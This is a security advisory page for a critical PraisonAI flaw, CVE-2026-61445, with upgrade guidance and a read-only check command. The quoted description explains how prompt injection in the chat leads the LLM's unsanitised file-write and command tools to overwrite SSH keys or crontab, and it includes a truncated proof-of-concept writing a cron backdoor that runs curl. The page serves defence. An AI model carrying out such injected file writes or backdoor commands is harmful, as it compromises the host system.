Skip to content

← Actionable
Critical, CVSS 9.9amended

PraisonAI: AICoder Arbitrary File Write and Command Execution via LLM Tool Calls

CVE-2026-61445GHSA-9mp3-24cc-77mg

What to do

Vendor fix available. Upgrade each affected package to the fixed version on its release line (praisonai 4.6.78), redeploy, then verify what is actually installed.

This page has no inventory attached, so it cannot say whether you are affected. A vendor fix is not proof that your deployment is fixed.

Affected packages

  • PyPI praisonai

    Affected
    <= 4.6.77
    Fixed in
    4.6.78

Sources

Severity and exploitation
Exploitation
No confirmed exploitation recorded. Patch Next marks exploitation only from CISA KEV.
CVSS
9.9 · CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS
  • CVE-2026-61445: 0.64% estimated exploitation activity in the next 30 days; percentile 50.72 (FIRST EPSS, 2026-11-03). This is a model estimate, not proof of exploitation or customer exposure.
Source description

As published by the source; long descriptions are shortened.

Summary The AICoder UI component exposes writetofile and executecommand tools to the LLM with no path validation and no command sanitization. An attacker can achieve arbitrary file write to any location on the filesystem (including /root/.ssh/authorizedkeys, /etc/crontab) and arbitrary command execution through prompt injection in the chat interface. Docker containers run as root, maximizing impact. Details Path Traversal in writetofile src/praisonai/praisonai/ui/components/aicoder.py (lines 122-131): The applyllmresponse method at line 269 uses os.path.join which does not prevent absolute paths: Command Injection in executecommand src/praisonai/praisonai/ui/components/aicoder.py (lines 159-180): No command sanitization, no allowlist, no sandbox. The command string comes from LLM tool-call responses (line 279), which are influenced by user input. PoC 1. Path traversal via prompt injection: The LLM calls writetofile("/etc/cron.d/backdoor", " root curl ..."), no path validation blocks…

Dates and revisions
Published by the source
Last modified by the source
Source last checked
  1. Revision 3 · amended ·

    Amended from ghsa record GHSA-9mp3-24cc-77mg

  2. Revision 2 · amended ·

    Amended from osv record GHSA-9mp3-24cc-77mg

  3. Revision 1 · created ·

    Published from ghsa record GHSA-9mp3-24cc-77mg

Agent brief

Preview the exact text before you copy it. Commands are read-only suggestions; review them before running anything.

# Patch Next advisory brief: CVE-2026-61445

Advisory: PraisonAI: AICoder Arbitrary File Write and Command Execution via LLM Tool Calls
IDs: CVE-2026-61445, GHSA-9mp3-24cc-77mg
Record: https://patchnext.com/advisories/cve-2026-61445 (revision 3, source checked 26 Oct 2026, 13:55 UTC)
Inventory: none attached. This brief comes from a public page and does not say whether any deployment is affected.
Severity: Critical (CVSS 9.9)
Exploitation: no confirmed exploitation recorded. Patch Next confirms exploitation only from CISA KEV.
Vendor response: Vendor fix available; fixed versions by package: praisonai 4.6.78. A vendor fix does not mean a deployment is fixed.

## Affected components
- PyPI praisonai: affected <= 4.6.77; fixed in 4.6.78

## Suggested inspection (read-only)
- `python -m pip show praisonai`: prints the installed version. Run with the environment that serves production active.

## Supported action
Upgrade each affected component to a fixed version on its release line. For a transitive dependency, upgrade the parent package or add an override or constraint, then regenerate the lockfile. Redeploy every environment that ran an affected version.

## Required regression checks
- Run the test suite and a production build.
- Exercise the features that depend on praisonai.
- Repeat the inspection and confirm that only fixed versions remain installed.

## Rollback considerations
- Keep the previous lockfile and deployment artifact. Rolling back reinstates the vulnerable version, so apply any documented mitigation while you fix forward.

## Unresolved questions
- Which deployments run an affected version?
- Exploitation status can change. Check again before lowering the priority.
- Mark the work resolved only after the fixed version is verified in production.

## Sources
- Verified: https://github.com/advisories/GHSA-9mp3-24cc-77mg (GitHub-reviewed advisory GHSA-9mp3-24cc-77mg lists affected ranges: PyPI praisonai >=0 <=4.6.77)
- Verified: https://osv.dev/vulnerability/GHSA-9mp3-24cc-77mg (OSV record GHSA-9mp3-24cc-77mg lists affected ranges: PyPI praisonai >=0 <4.6.78 (fixed))

Commands are suggestions: review each one before running it.

Loading voting…